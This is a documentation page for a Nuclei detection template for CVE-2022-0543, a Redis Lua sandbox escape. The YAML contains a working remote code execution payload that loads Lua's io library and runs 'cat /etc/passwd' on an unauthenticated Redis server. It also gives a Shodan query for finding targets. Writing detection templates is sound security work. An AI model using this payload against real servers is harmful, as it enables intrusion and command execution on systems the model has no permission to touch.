Skip to content
Nuclei Templates

Redis Sandbox Escape - Remote Code Execution

ID: CVE-2022-0543

Severity: critical

Author: dwisiswant0

Tags: cve,cve2022,network,redis,unauth,rce,kev,tcp

Description

Section titled “Description”

This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. Thevulnerability was introduced by Debian and Ubuntu Redis packages thatinsufficiently sanitized the Lua environment. The maintainers failed todisable the package interface, allowing attackers to load arbitrary libraries.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0543


info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
  remediation: Update to the most recent versions currently available.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
    - https://lists.debian.org/debian-security-announce/2022/msg00048.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
    epss-score: 0.97184
    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redis
    product: redis
    shodan-query:
      - redis_version
      - redis
  tags: cve,cve2022,network,redis,unauth,rce,kev,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6380


    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64


    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a00483046022100da6acc0d9d3ab5198254a0b9410ce5b17dfe310186a1074e0936a11f4f727de7022100dc868acb9ae040c7a2d32779584bc36a71a295d9dd4536e4995d650a4e1706ee:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2022/CVE-2022-0543.yaml"

View on Github